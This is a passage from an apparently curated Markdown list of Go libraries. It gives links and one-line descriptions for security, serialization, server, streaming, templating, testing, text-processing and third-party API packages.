- [goSecretBoxPassword](https://github.com/dwin/goSecretBoxPassword) - A probably paranoid package for securely hashing and encrypting passwords.
- [Interpol](https://github.com/avahidi/interpol) - Rule-based data generator for fuzzing and penetration testing.
- [lego](https://github.com/go-acme/lego) - Pure Go ACME client library and CLI tool (for use with Let's Encrypt).
- [memguard](https://github.com/awnumar/memguard) - A pure Go library for handling sensitive values in memory.
- [nacl](https://github.com/kevinburke/nacl) - Go implementation of the NaCL set of API's.
- [optimus-go](https://github.com/pjebs/optimus-go) - ID hashing and Obfuscation using Knuth's Algorithm.
- [passlib](https://github.com/hlandau/passlib) - Futureproof password hashing library.
- [secret](https://github.com/rsjethani/secret) - Prevent your secrets from leaking into logs, std\* etc.
- [secure](https://github.com/unrolled/secure) - HTTP middleware for Go that facilitates some quick security wins.
- [secureio](https://github.com/xaionaro-go/secureio) - An keyexchanging+authenticating+encrypting wrapper and multiplexer for `io.ReadWriteCloser` based on XChaCha20-poly1305, ECDH and ED25519.
- [simple-scrypt](https://github.com/elithrar/simple-scrypt) - Scrypt package with a simple, obvious API and automatic cost calibration built-in.
- [ssh-vault](https://github.com/ssh-vault/ssh-vault) - encrypt/decrypt using ssh keys.
- [sslmgr](https://github.com/adrianosela/sslmgr) - SSL certificates made easy with a high level wrapper around acme/autocert.
- [teler-waf](https://github.com/kitabisa/teler-waf) - teler-waf is a Go HTTP middleware that provide teler IDS functionality to protect against web-based attacks and improve the security of Go-based web applications. It is highly configurable and easy to integrate into existing Go applications.
- [themis](https://github.com/cossacklabs/themis) - high-level cryptographic library for solving typical data security tasks (secure data storage, secure messaging, zero-knowledge proof authentication), available for 14 languages, best fit for multi-platform apps.
**[⬆ back to top](#contents)**
## Serialization
_Libraries and tools for binary serialization._
- [asn1](https://github.com/PromonLogicalis/asn1) - Asn.1 BER and DER encoding library for golang.
- [bambam](https://github.com/glycerine/bambam) - generator for Cap'n Proto schemas from go.
- [bel](https://github.com/32leaves/bel) - Generate TypeScript interfaces from Go structs/interfaces. Useful for JSON RPC.
- [binstruct](https://github.com/ghostiam/binstruct) - Golang binary decoder for mapping data into the structure.
- [cbor](https://github.com/fxamacker/cbor) - Small, safe, and easy CBOR encoding and decoding library.
- [colfer](https://github.com/pascaldekloe/colfer) - Code generation for the Colfer binary format.
- [csvutil](https://github.com/jszwec/csvutil) - High Performance, idiomatic CSV record encoding and decoding to native Go structures.
- [elastic](https://github.com/epiclabs-io/elastic) - Convert slices, maps or any other unknown value across different types at run-time, no matter what.
- [fixedwidth](https://github.com/huydang284/fixedwidth) - Fixed-width text formatting (UTF-8 supported).
- [fwencoder](https://github.com/o1egl/fwencoder) - Fixed width file parser (encoding and decoding library) for Go.
- [go-capnproto](https://github.com/glycerine/go-capnproto) - Cap'n Proto library and parser for go.
- [go-codec](https://github.com/ugorji/go) - High Performance, feature-Rich, idiomatic encode, decode and rpc library for msgpack, cbor and json, with runtime-based OR code-generation support.
- [go-lctree](https://github.com/sbourlon/go-lctree) - Provides a CLI and primitives to serialize and deserialize [LeetCode binary trees](https://support.leetcode.com/hc/en-us/articles/360011883654-What-does-1-null-2-3-mean-in-binary-tree-representation).
- [gogoprotobuf](https://github.com/gogo/protobuf) - Protocol Buffers for Go with Gadgets.
- [goprotobuf](https://github.com/golang/protobuf) - Go support, in the form of a library and protocol compiler plugin, for Google's protocol buffers.
- [jsoniter](https://github.com/json-iterator/go) - High-performance 100% compatible drop-in replacement of "encoding/json".
- [mapstructure](https://github.com/mitchellh/mapstructure) - Go library for decoding generic map values into native Go structures.
- [php_session_decoder](https://github.com/yvasiyarov/php_session_decoder) - GoLang library for working with PHP session format and PHP Serialize/Unserialize functions.
- [pletter](https://github.com/vimeda/pletter) - A standard way to wrap a proto message for message brokers.
- [structomap](https://github.com/tuvistavie/structomap) - Library to easily and dynamically generate maps from static structures.
- [unitpacking](https://github.com/recolude/unitpacking) - Library to pack unit vectors into as fewest bytes as possible.
**[⬆ back to top](#contents)**
## Server Applications
- [algernon](https://github.com/xyproto/algernon) - HTTP/2 web server with built-in support for Lua, Markdown, GCSS and Amber.
- [Caddy](https://github.com/caddyserver/caddy) - Caddy is an alternative, HTTP/2 web server that's easy to configure and use.
- [consul](https://www.consul.io/) - Consul is a tool for service discovery, monitoring and configuration.
- [cortex-tenant](https://github.com/blind-oracle/cortex-tenant) - Prometheus remote write proxy that adds add Cortex tenant ID header based on metric labels.
- [devd](https://github.com/cortesi/devd) - Local webserver for developers.
- [discovery](https://github.com/Bilibili/discovery) - A registry for resilient mid-tier load balancing and failover.
- [dudeldu](https://github.com/krotik/dudeldu) - A simple SHOUTcast server.
- [dummy](https://github.com/neotoolkit/dummy) - Run mock server based off an API contract with one command.
- [Easegress](https://github.com/megaease/easegress) - A cloud native high availability/performance traffic orchestration system with observability and extensibility.
- [etcd](https://github.com/coreos/etcd) - Highly-available key value store for shared configuration and service discovery.
- [Euterpe](https://github.com/ironsmile/euterpe) - Self-hosted music streaming server with built-in web UI and REST API.
- [Fider](https://github.com/getfider/fider) - Fider is an open platform to collect and organize customer feedback.
- [Flagr](https://github.com/checkr/flagr) - Flagr is an open-source feature flagging and A/B testing service.
- [flipt](https://github.com/markphelps/flipt) - A self contained feature flag solution written in Go and Vue.js
- [go-feature-flag](https://github.com/thomaspoignant/go-feature-flag) - A feature flag solution, with only a YAML file in the backend (S3, GitHub, HTTP, local file ...), no server to install, just add a file in a central system and refer to it.
- [go-proxy-cache](https://github.com/fabiocicerchia/go-proxy-cache) - Simple Reverse Proxy with Caching, written in Go, using Redis.
- [jackal](https://github.com/ortuman/jackal) - An XMPP server written in Go.
- [lets-proxy2](https://github.com/rekby/lets-proxy2) - Reverse proxy for handle https with issue certificates in fly from lets-encrypt.
- [minio](https://github.com/minio/minio) - Minio is a distributed object storage server.
- [Moxy](https://github.com/sinhashubham95/moxy) - Moxy is a simple mocker and proxy application server, you can create mock endpoints as well as proxy requests in case no mock exists for the endpoint.
- [nginx-prometheus](https://github.com/blind-oracle/nginx-prometheus) - Nginx log parser and exporter to Prometheus.
- [nsq](https://nsq.io/) - A realtime distributed messaging platform.
- [protoxy](https://github.com/camgraff/protoxy) - A proxy server that converts JSON request bodies to Protocol Buffers.
- [psql-streamer](https://github.com/blind-oracle/psql-streamer) - Stream database events from PostgreSQL to Kafka.
- [riemann-relay](https://github.com/blind-oracle/riemann-relay) - Relay to load-balance Riemann events and/or convert them to Carbon.
- [RoadRunner](https://github.com/spiral/roadrunner) - High-performance PHP application server, load-balancer and process manager.
- [SFTPGo](https://github.com/drakkan/sftpgo) - Fully featured and highly configurable SFTP server with optional FTP/S and WebDAV support. It can serve local filesystem and Cloud Storage backends such as S3 and Google Cloud Storage.
- [simple-jwt-provider](https://github.com/leberKleber/simple-jwt-provider) - Simple and lightweight provider which exhibits JWTs, supports login, password-reset (via mail) and user management.
- [Trickster](https://github.com/tricksterproxy/trickster) - HTTP reverse proxy cache and time series accelerator.
- [Wish](https://github.com/charmbracelet/wish) - Make SSH apps, just like that!
**[⬆ back to top](#contents)**
## Stream Processing
_Libraries and tools for stream processing and reactive programming._
- [go-streams](https://github.com/reugn/go-streams) - Go stream processing library.
- [goio](https://github.com/primetalk/goio) - An implementation of IO, Stream, Fiber for Golang, inspired by awesome Scala libraries cats and fs2.
- [machine](https://github.com/whitaker-io/machine) - Go library for writing and generating stream workers with built in metrics and traceability.
- [stream](https://github.com/youthlin/stream) - Go Stream, like Java 8 Stream: Filter/Map/FlatMap/Peek/Sorted/ForEach/Reduce...
**[⬆ back to top](#contents)**
## Template Engines
_Libraries and tools for templating and lexing._
- [ego](https://github.com/benbjohnson/ego) - Lightweight templating language that lets you write templates in Go. Templates are translated into Go and compiled.
- [extemplate](https://github.com/dannyvankooten/extemplate) - Tiny wrapper around html/template to allow for easy file-based template inheritance.
- [fasttemplate](https://github.com/valyala/fasttemplate) - Simple and fast template engine. Substitutes template placeholders up to 10x faster than [text/template](https://golang.org/pkg/text/template/).
- [gospin](https://github.com/m1/gospin) - Article spinning and spintax/spinning syntax engine, useful for A/B, testing pieces of text/articles and creating more natural conversations.
- [got](https://github.com/goradd/got) - A Go code generator inspired by Hero and Fasttemplate. Has include files, custom tag definitions, injected Go code, language translation, and more.
- [goview](https://github.com/foolin/goview) - Goview is a lightweight, minimalist and idiomatic template library based on golang html/template for building Go web application.
- [jet](https://github.com/CloudyKit/jet) - Jet template engine.
- [liquid](https://github.com/osteele/liquid) - Go implementation of Shopify Liquid templates.
- [maroto](https://github.com/johnfercher/maroto) - A maroto way to create PDFs. Maroto is inspired in Bootstrap and uses gofpdf. Fast and simple.
- [pongo2](https://github.com/flosch/pongo2) - Django-like template-engine for Go.
- [quicktemplate](https://github.com/valyala/quicktemplate) - Fast, powerful, yet easy to use template engine. Converts templates into Go code and then compiles it.
- [raymond](https://github.com/aymerick/raymond) - Complete handlebars implementation in Go.
- [Razor](https://github.com/sipin/gorazor) - Razor view engine for Golang.
- [Soy](https://github.com/robfig/soy) - Closure templates (aka Soy templates) for Go, following the [official spec](https://developers.google.com/closure/templates/).
- [sprig](https://github.com/Masterminds/sprig) - Useful template functions for Go templates.
- [tbd](https://github.com/lucasepe/tbd) - A really simple way to create text templates with placeholders - exposes extra builtin Git repo metadata.
**[⬆ back to top](#contents)**
## Testing
_Libraries for testing codebases and generating test data._
- Testing Frameworks
- [apitest](https://apitest.dev) - Simple and extensible behavioural testing library for REST based services or HTTP handlers that supports mocking external http calls and rendering of sequence diagrams.
- [assert](https://github.com/go-playground/assert) - Basic Assertion Library used along side native go testing, with building blocks for custom assertions.
- [badio](https://github.com/cavaliercoder/badio) - Extensions to Go's `testing/iotest` package.
- [baloo](https://github.com/h2non/baloo) - Expressive and versatile end-to-end HTTP API testing made easy.
- [be](https://github.com/carlmjohnson/be) - The minimalist generic test assertion library.
- [biff](https://github.com/fulldump/biff) - Bifurcation testing framework, BDD compatible.
- [charlatan](https://github.com/percolate/charlatan) - Tool to generate fake interface implementations for tests.
- [commander](https://github.com/SimonBaeumer/commander) - Tool for testing cli applications on windows, linux and osx.
- [covergates](https://github.com/covergates/covergates) - Self-hosted code coverage report review and management service.
- [cupaloy](https://github.com/bradleyjkemp/cupaloy) - Simple snapshot testing addon for your test framework.
- [dbcleaner](https://github.com/khaiql/dbcleaner) - Clean database for testing purpose, inspired by `database_cleaner` in Ruby.
- [dsunit](https://github.com/viant/dsunit) - Datastore testing for SQL, NoSQL, structured files.
- [embedded-postgres](https://github.com/fergusstrange/embedded-postgres) - Run a real Postgres database locally on Linux, OSX or Windows as part of another Go application or test.
- [endly](https://github.com/viant/endly) - Declarative end to end functional testing.
- [fixenv](https://github.com/rekby/fixenv) - Fixture manage engine, inspired by pytest fixtures.
- [fluentassert](https://github.com/fluentassert/verify) - Extensible, type-safe, fluent assertion Go library.
- [flute](https://github.com/suzuki-shunsuke/flute) - HTTP client testing framework.
- [frisby](https://github.com/verdverm/frisby) - REST API testing framework.
- [gherkingen](https://github.com/hedhyw/gherkingen) - BDD boilerplate generator and framework.
- [ginkgo](https://onsi.github.io/ginkgo/) - BDD Testing Framework for Go.
- [gnomock](https://github.com/orlangure/gnomock) - integration testing with real dependencies (database, cache, even Kubernetes or AWS) running in Docker, without mocks.
- [go-carpet](https://github.com/msoap/go-carpet) - Tool for viewing test coverage in terminal.
- [go-cmp](https://github.com/google/go-cmp) - Package for comparing Go values in tests.
- [go-hit](https://github.com/Eun/go-hit) - Hit is an http integration test framework written in golang.
- [go-mutesting](https://github.com/zimmski/go-mutesting) - Mutation testing for Go source code.
- [go-mysql-test-container](https://github.com/arikama/go-mysql-test-container) - Golang MySQL testcontainer to help with MySQL integration testing.
- [go-snaps](http://github.com/gkampitakis/go-snaps) - Jest-like snapshot testing in Golang.
- [go-testdeep](https://github.com/maxatome/go-testdeep) - Extremely flexible golang deep comparison, extends the go testing package.
- [go-testpredicate](https://github.com/maargenton/go-testpredicate) - Test predicate style assertions library with extensive diagnostics output.
- [go-vcr](https://github.com/dnaeon/go-vcr) - Record and replay your HTTP interactions for fast, deterministic and accurate tests.
- [goblin](https://github.com/franela/goblin) - Mocha like testing framework fo Go.
- [goc](https://github.com/qiniu/goc) - Goc is a comprehensive coverage testing system for The Go Programming Language.
- [gocheck](https://labix.org/gocheck) - More advanced testing framework alternative to gotest.
- [GoConvey](https://github.com/smartystreets/goconvey/) - BDD-style framework with web UI and live reload.
- [gocrest](https://github.com/corbym/gocrest) - Composable hamcrest-like matchers for Go assertions.
- [godog](https://github.com/cucumber/godog) - Cucumber BDD framework for Go.
- [gofight](https://github.com/appleboy/gofight) - API Handler Testing for Golang Router framework.
- [gogiven](https://github.com/corbym/gogiven) - YATSPEC-like BDD testing framework for Go.
- [gomatch](https://github.com/jfilipczyk/gomatch) - library created for testing JSON against patterns.
- [gomega](https://onsi.github.io/gomega/) - Rspec like matcher/assertion library.
- [Gont](https://github.com/stv0g/gont) - Go network testing toolkit for testing building complex network topologies using Linux namespaces.
- [GoSpec](https://github.com/orfjackal/gospec) - BDD-style testing framework for the Go programming language.
- [gospecify](https://github.com/stesla/gospecify) - This provides a BDD syntax for testing your Go code. It should be familiar to anybody who has used libraries such as rspec.
- [gosuite](https://github.com/pavlo/gosuite) - Brings lightweight test suites with setup/teardown facilities to `testing` by leveraging Go1.7's Subtests.
- [got](https://github.com/ysmood/got) - An enjoyable golang test framework.
- [gotest.tools](https://github.com/gotestyourself/gotest.tools) - A collection of packages to augment the go testing package and support common patterns.
- [Hamcrest](https://github.com/rdrdr/hamcrest) - fluent framework for declarative Matcher objects that, when applied to input values, produce self-describing results.
- [httpexpect](https://github.com/gavv/httpexpect) - Concise, declarative, and easy to use end-to-end HTTP and REST API testing.
- [is](https://github.com/matryer/is) - Professional lightweight testing mini-framework for Go.
- [jsonassert](https://github.com/kinbiko/jsonassert) - Package for verifying that your JSON payloads are serialized correctly.
- [omg.testingtools](https://github.com/dedalqq/omg.testingtools) - The simple library for change a values of private fields for testing.
- [restit](https://github.com/yookoala/restit) - Go micro framework to help writing RESTful API integration test.
- [schema](https://github.com/jgroeneveld/schema) - Quick and easy expression matching for JSON schemas used in requests and responses.
- [stop-and-go](https://github.com/elgohr/stop-and-go) - Testing helper for concurrency.
- [testcase](https://github.com/adamluzsi/testcase) - Idiomatic testing framework for Behavior Driven Development.
- [testcontainers-go](https://github.com/testcontainers/testcontainers-go) - A Go package that makes it simple to create and clean up container-based dependencies for automated integration/smoke tests. The clean, easy-to-use API enables developers to programmatically define containers that should be run as part of a test and clean up those resources when the test is done.
- [testfixtures](https://github.com/go-testfixtures/testfixtures) - A helper for Rails' like test fixtures to test database applications.
- [Testify](https://github.com/stretchr/testify) - Sacred extension to the standard go testing package.
- [testmd](https://godoc.org/github.com/tvastar/test/cmd/testmd) - Convert markdown snippets into testable go code.
- [testsql](https://github.com/zhulongcheng/testsql) - Generate test data from SQL files before testing and clear it after finished.
- [testza](https://github.com/MarvinJWendt/testza) - Full-featured test framework with nice colorized output.
- [trial](https://github.com/jgroeneveld/trial) - Quick and easy extendable assertions without introducing much boilerplate.
- [Tt](https://github.com/vcaesar/tt) - Simple and colorful test tools.
- [wstest](https://github.com/posener/wstest) - Websocket client for unit-testing a websocket http.Handler.
- Mock
- [counterfeiter](https://github.com/maxbrunsfeld/counterfeiter) - Tool for generating self-contained mock objects.
- [genmock](https://gitlab.com/so_literate/genmock) - Go mocking system with code generator for building calls of the interface methods.
- [go-localstack](https://github.com/elgohr/go-localstack) - Tool for using localstack in AWS testing.
- [go-sqlmock](https://github.com/DATA-DOG/go-sqlmock) - Mock SQL driver for testing database interactions.
- [go-txdb](https://github.com/DATA-DOG/go-txdb) - Single transaction based database driver mainly for testing purposes.
- [gock](https://github.com/h2non/gock) - Versatile HTTP mocking made easy.
- [gomock](https://github.com/golang/mock) - Mocking framework for the Go programming language.
- [govcr](https://github.com/seborama/govcr) - HTTP mock for Golang: record and replay HTTP interactions for offline testing.
- [hoverfly](https://github.com/SpectoLabs/hoverfly) - HTTP(S) proxy for recording and simulating REST/SOAP APIs with extensible middleware and easy-to-use CLI.
- [httpmock](https://github.com/jarcoal/httpmock) - Easy mocking of HTTP responses from external resources.
- [minimock](https://github.com/gojuno/minimock) - Mock generator for Go interfaces.
- [mockery](https://github.com/vektra/mockery) - Tool to generate Go interfaces.
- [mockhttp](https://github.com/tv42/mockhttp) - Mock object for Go http.ResponseWriter.
- [mockit](https://github.com/pasdam/mockit) - Allows functions and method easy mocking, without defining new types; it's similar to Mockito for Java.
- [monkey](https://github.com/awterman/monkey) - One line to mock functions/methods/variables in place without dependency injection or code generation.
- [mooncake](https://github.com/GuilhermeCaruso/mooncake) - A simple way to generate mocks for multiple purposes
- [timex](https://github.com/cabify/timex) - A test-friendly replacement for the native `time` package.
- Fuzzing and delta-debugging/reducing/shrinking.
- [go-fuzz](https://github.com/dvyukov/go-fuzz) - Randomized testing system.
- [gofuzz](https://github.com/google/gofuzz) - Library for populating go objects with random values.
- [Tavor](https://github.com/zimmski/tavor) - Generic fuzzing and delta-debugging framework.
- Selenium and browser control tools.
- [cdp](https://github.com/mafredri/cdp) - Type-safe bindings for the Chrome Debugging Protocol that can be used with browsers or other debug targets that implement it.
- [chromedp](https://github.com/knq/chromedp) - a way to drive/test Chrome, Safari, Edge, Android Webviews, and other browsers supporting the Chrome Debugging Protocol.
- [ggr](https://github.com/aerokube/ggr) - a lightweight server that routes and proxies Selenium WebDriver requests to multiple Selenium hubs.
- [playwright-go](https://github.com/mxschmitt/playwright-go) - browser automation library to control Chromium, Firefox and WebKit with a single API.
- [rod](https://github.com/go-rod/rod) - A Devtools driver to make web automation and scraping easy.
- [selenoid](https://github.com/aerokube/selenoid) - alternative Selenium hub server that launches browsers within containers.
- Fail injection
- [failpoint](https://github.com/pingcap/failpoint) - An implementation of [failpoints](https://www.freebsd.org/cgi/man.cgi?query=fail) for Golang.
**[⬆ back to top](#contents)**
## Text Processing
_Libraries for parsing and manipulating texts._
See also [Natural Language Processing](#natural-language-processing) and [Text Analysis](#text-analysis).
### Formatters
- [address](https://github.com/bojanz/address) - Handles address representation, validation and formatting.
- [align](https://github.com/Guitarbum722/align) - A general purpose application that aligns text.
- [bytes](https://github.com/labstack/gommon/tree/master/bytes) - Formats and parses numeric byte values (10K, 2M, 3G, etc.).
- [go-fixedwidth](https://github.com/ianlopshire/go-fixedwidth) - Fixed-width text formatting (encoder/decoder with reflection).
- [go-humanize](https://github.com/dustin/go-humanize) - Formatters for time, numbers, and memory size to human readable format.
- [gotabulate](https://github.com/bndr/gotabulate) - Easily pretty-print your tabular data with Go.
- [textwrap](https://github.com/isbm/textwrap) - Wraps text at end of lines. Implementation of `textwrap` module from Python.
### Markup Languages
- [bafi](https://github.com/mmalcek/bafi) - Universal JSON, BSON, YAML, XML translator to ANY format using templates.
- [bbConvert](https://github.com/CalebQ42/bbConvert) - Converts bbCode to HTML that allows you to add support for custom bbCode tags.
- [blackfriday](https://github.com/russross/blackfriday) - Markdown processor in Go.
- [github_flavored_markdown](https://godoc.org/github.com/shurcooL/github_flavored_markdown) - GitHub Flavored Markdown renderer (using blackfriday) with fenced code block highlighting, clickable header anchor links.
- [go-output-format](https://github.com/drewstinnett/go-output-format) - Output go structures into multiple formats (YAML/JSON/etc) in your command line app.
- [go-toml](https://github.com/pelletier/go-toml) - Go library for the TOML format with query support and handy cli tools.
- [goldmark](https://github.com/yuin/goldmark) - A Markdown parser written in Go. Easy to extend, standard (CommonMark) compliant, well structured.
- [goq](https://github.com/andrewstuart/goq) - Declarative unmarshaling of HTML using struct tags with jQuery syntax (uses GoQuery).
- [html-to-markdown](https://github.com/JohannesKaufmann/html-to-markdown) - Convert HTML to Markdown. Even works with entire websites and can be extended through rules.
- [htmlquery](https://github.com/antchfx/htmlquery) - An XPath query package for HTML, lets you extract data or evaluate from HTML documents by an XPath expression.
- [htmlyaml](https://github.com/nikolaydubina/htmlyaml) - Rich rendering of YAML as HTML in Go
- [mxj](https://github.com/clbanning/mxj) - Encode / decode XML as JSON or map[string]interface{}; extract values with dot-notation paths and wildcards. Replaces x2j and j2x packages.
- [toml](https://github.com/BurntSushi/toml) - TOML configuration format (encoder/decoder with reflection).
### Parsers/Encoders/Decoders
- [allot](https://github.com/sbstjn/allot) - Placeholder and wildcard text parsing for CLI tools and bots.
- [codetree](https://github.com/aerogo/codetree) - Parses indented code (python, pixy, scarlet, etc.) and returns a tree structure.
- [commonregex](https://github.com/mingrammer/commonregex) - A collection of common regular expressions for Go.
- [did](https://github.com/ockam-network/did) - DID (Decentralized Identifiers) Parser and Stringer in Go.
- [doi](https://github.com/hscells/doi) - Document object identifier (doi) parser in Go.
- [editorconfig-core-go](https://github.com/editorconfig/editorconfig-core-go) - Editorconfig file parser and manipulator for Go.
- [encdec](https://github.com/mickep76/encdec) - Package provides a generic interface to encoders and decoders.
- [go-fasttld](https://github.com/elliotwutingfeng/go-fasttld) - High performance effective top level domains (eTLD) extraction module.
- [go-nmea](https://github.com/adrianmo/go-nmea) - NMEA parser library for the Go language.
- [go-vcard](https://github.com/emersion/go-vcard) - Parse and format vCard.
- [gofeed](https://github.com/mmcdole/gofeed) - Parse RSS and Atom feeds in Go.
- [gographviz](https://github.com/awalterschulze/gographviz) - Parses the Graphviz DOT language.
- [gonameparts](https://github.com/polera/gonameparts) - Parses human names into individual name parts.
- [ltsv](https://github.com/Wing924/ltsv) - High performance [LTSV (Labeled Tab Separated Value)](http://ltsv.org/) reader for Go.
- [normalize](https://github.com/avito-tech/normalize) - Sanitize, normalize and compare fuzzy text.
- [omniparser](https://github.com/jf-tech/omniparser) - A versatile ETL library that parses text input (CSV/txt/JSON/XML/EDI/X12/EDIFACT/etc) in streaming fashion and transforms data into JSON output using data-driven schema.
- [parseargs-go](https://github.com/nproc/parseargs-go) - string argument parser that understands quotes and backslashes.
- [parth](https://github.com/codemodus/parth) - URL path segmentation parsing.
- [sdp](https://github.com/gortc/sdp) - SDP: Session Description Protocol [[RFC 4566](https://tools.ietf.org/html/rfc4566)].
- [sh](https://github.com/mvdan/sh) - Shell parser and formatter.
- [tokenizer](https://github.com/bzick/tokenizer) - Parse any string, slice or infinite buffer to any tokens.
- [when](https://github.com/olebedev/when) - Natural EN and RU language date/time parser with pluggable rules.
- [xj2go](https://github.com/stackerzzq/xj2go) - Convert xml or json to go struct.
### Regular Expressions
- [genex](https://github.com/alixaxel/genex) - Count and expand Regular Expressions into all matching Strings.
- [go-wildcard](https://github.com/IGLOU-EU/go-wildcard) - Simple and lightweight wildcard pattern matching.
- [goregen](https://github.com/zach-klippenstein/goregen) - Library for generating random strings from regular expressions.
- [regroup](https://github.com/oriser/regroup) - Match regex expression named groups into go struct using struct tags and automatic parsing.
- [rex](https://github.com/hedhyw/rex) - Regular expressions builder.
### Sanitation
- [bluemonday](https://github.com/microcosm-cc/bluemonday) - HTML Sanitizer.
- [gofuckyourself](https://github.com/JoshuaDoes/gofuckyourself) - A sanitization-based swear filter for Go.
### Scrapers
- [colly](https://github.com/asciimoo/colly) - Fast and Elegant Scraping Framework for Gophers.
- [dataflowkit](https://github.com/slotix/dataflowkit) - Web scraping Framework to turn websites into structured data.
- [go-recipe](https://github.com/kkyr/go-recipe) - A package for scraping recipes from websites.
- [GoQuery](https://github.com/PuerkitoBio/goquery) - GoQuery brings a syntax and a set of features similar to jQuery to the Go language.
- [gospider](https://github.com/zhshch2002/gospider) - A simple golang spider/scraping framework,build a spider in 3 lines. migrated from [goribot](https://github.com/zhshch2002/goribot)
- [pagser](https://github.com/foolin/pagser) - Pagser is a simple, extensible, configurable parse and deserialize html page to struct based on goquery and struct tags for golang crawler.
- [Tagify](https://github.com/zoomio/tagify) - Produces a set of tags from given source.
- [walker](https://github.com/cyucelen/walker) - Seamlessly fetch paginated data from any source. Simple and high performance API scraping included.
- [xurls](https://github.com/mvdan/xurls) - Extract urls from text.
### RSS
- [podcast](https://github.com/eduncan911/podcast) - iTunes Compliant and RSS 2.0 Podcast Generator in Golang
- [syndfeed](https://github.com/zhengchun/syndfeed) - A syndication feed for Atom 1.0 and RSS 2.0.
### Utility/Miscellaneous
- [go-runewidth](https://github.com/mattn/go-runewidth) - Functions to get fixed width of the character or string.
- [go-zero-width](https://github.com/trubitsyn/go-zero-width) - Zero-width character detection and removal for Go.
- [kace](https://github.com/codemodus/kace) - Common case conversions covering common initialisms.
- [petrovich](https://github.com/striker2000/petrovich) - Petrovich is the library which inflects Russian names to given grammatical case.
- [radix](https://github.com/yourbasic/radix) - Fast string sorting algorithm.
- [TySug](https://github.com/Dynom/TySug) - Alternative suggestions with respect to keyboard layouts.
**[⬆ back to top](#contents)**
## Third-party APIs
_Libraries for accessing third party APIs._
- [airtable](https://github.com/mehanizm/airtable) - Go client library for the [Airtable API](https://airtable.com/api).
- [amazon-product-advertising-api](https://github.com/ngs/go-amazon-product-advertising-api) - Go Client Library for [Amazon Product Advertising API](https://affiliate-program.amazon.com/gp/advertising/api/detail/main.html).
- [anaconda](https://github.com/ChimeraCoder/anaconda) - Go client library for the Twitter 1.1 API.
- [appstore-sdk-go](https://github.com/Kachit/appstore-sdk-go) - Unofficial Golang SDK for AppStore Connect API.
- [aws-sdk-go](https://github.com/aws/aws-sdk-go) - The official AWS SDK for the Go programming language.
- [bqwriter](https://github.com/OTA-Insight/bqwriter) - High Level Go Library to write data into [Google BigQuery](https://cloud.google.com/bigquery) at a high throughout.
- [brewerydb](https://github.com/naegelejd/brewerydb) - Go library for accessing the BreweryDB API.
- [cachet](https://github.com/andygrunwald/cachet) - Go client library for [Cachet (open source status page system)](https://cachethq.io/).
- [circleci](https://github.com/jszwedko/go-circleci) - Go client library for interacting with CircleCI's API.
- [clarifai](https://github.com/samuelcouch/clarifai) - Go client library for interfacing with the Clarifai API.
- [codeship-go](https://github.com/codeship/codeship-go) - Go client library for interacting with Codeship's API v2.
- [coinpaprika-go](https://github.com/coinpaprika/coinpaprika-api-go-client) - Go client library for interacting with Coinpaprika's API.
- [device-check-go](https://github.com/rinchsan/device-check-go) - Go client library for interacting with [iOS DeviceCheck API](https://developer.apple.com/documentation/devicecheck) v1.
- [discordgo](https://github.com/bwmarrin/discordgo) - Go bindings for the Discord Chat API.
- [dusupay-sdk-go](https://github.com/Kachit/dusupay-sdk-go) - Unofficial Dusupay payment gateway API Client for Go
- [ethrpc](https://github.com/onrik/ethrpc) - Go bindings for Ethereum JSON RPC API.
- [facebook](https://github.com/huandu/facebook) - Go Library that supports the Facebook Graph API.
- [fasapay-sdk-go](https://github.com/Kachit/fasapay-sdk-go) - Unofficial Fasapay payment gateway XML API Client for Golang.
- [fcm](https://github.com/maddevsio/fcm) - Go library for Firebase Cloud Messaging.
- [gads](https://github.com/emiddleton/gads) - Google Adwords Unofficial API.
- [gami](https://github.com/bit4bit/gami) - Go library for Asterisk Manager Interface.
- [gcm](https://github.com/Aorioli/gcm) - Go library for Google Cloud Messaging.
- [geo-golang](https://github.com/codingsince1985/geo-golang) - Go Library to access [Google Maps](https://developers.google.com/maps/documentation/geocoding/intro), [MapQuest](https://developer.mapquest.com/documentation/geocoding-api/), [Nominatim](https://developer.mapquest.com/documentation/open/nominatim-search), [OpenCage](https://opencagedata.com/api), [Bing](https://msdn.microsoft.com/en-us/library/ff701715.aspx), [Mapbox](https://www.mapbox.com/developers/api/geocoding/), and [OpenStreetMap](https://wiki.openstreetmap.org/wiki/Nominatim) geocoding / reverse geocoding APIs.
- [github](https://github.com/google/go-github) - Go library for accessing the GitHub REST API v3.
- [githubql](https://github.com/shurcooL/githubql) - Go library for accessing the GitHub GraphQL API v4.
- [go-atlassian](https://github.com/ctreminiom/go-atlassian) - Go library for accessing the [Atlassian Cloud](https://www.atlassian.com/enterprise/cloud) services (Jira, Jira Service Management, Jira Agile, Confluence, Admin Cloud)
- [go-aws-news](https://github.com/circa10a/go-aws-news) - Go application and library to fetch what's new from AWS.
- [go-chronos](https://github.com/axelspringer/go-chronos) - Go library for interacting with the [Chronos](https://mesos.github.io/chronos/) Job Scheduler
- [go-hacknews](https://github.com/PaulRosset/go-hacknews) - Tiny Go client for HackerNews API.
- [go-here](https://github.com/abdullahselek/go-here) - Go client library around the HERE location based APIs.
- [go-hibp](https://github.com/wneessen/go-hibp) - Simple Go binding to the "Have I Been Pwned" APIs.
- [go-imgur](https://github.com/koffeinsource/go-imgur) - Go client library for [imgur](https://imgur.com)
- [go-jira](https://github.com/andygrunwald/go-jira) - Go client library for [Atlassian JIRA](https://www.atlassian.com/software/jira)
- [go-lark](https://github.com/go-lark/lark) - An easy-to-use unofficial SDK for [Feishu](https://open.feishu.cn/) and [Lark](https://open.larksuite.com/) Open Platform.
- [go-marathon](https://github.com/gambol99/go-marathon) - Go library for interacting with Mesosphere's Marathon PAAS.
- [go-myanimelist](https://github.com/nstratos/go-myanimelist) - Go client library for accessing the [MyAnimeList API](https://myanimelist.net/apiconfig/references/api/v2).
- [go-openai](https://github.com/sashabaranov/go-openai) - OpenAI ChatGPT, DALL·E, Whisper API library for Go.
- [go-openproject](https://github.com/manuelbcd/go-openproject) - Go client library for interacting with [OpenProject](https://docs.openproject.org/api/) API.
- [go-postman-collection](https://github.com/rbretecher/go-postman-collection) - Go module to work with [Postman Collections](https://learning.getpostman.com/docs/postman/collections/creating-collections/) (compatible with Insomnia).
- [go-restcountries](https://github.com/chriscross0/go-restcountries) - Go library for the [REST Countries API](https://countrylayer.com/).
- [go-sophos](https://github.com/esurdam/go-sophos) - Go client library for the [Sophos UTM REST API](https://www.sophos.com/en-us/medialibrary/PDFs/documentation/UTMonAWS/Sophos-UTM-RESTful-API.pdf?la=en) with zero dependencies.
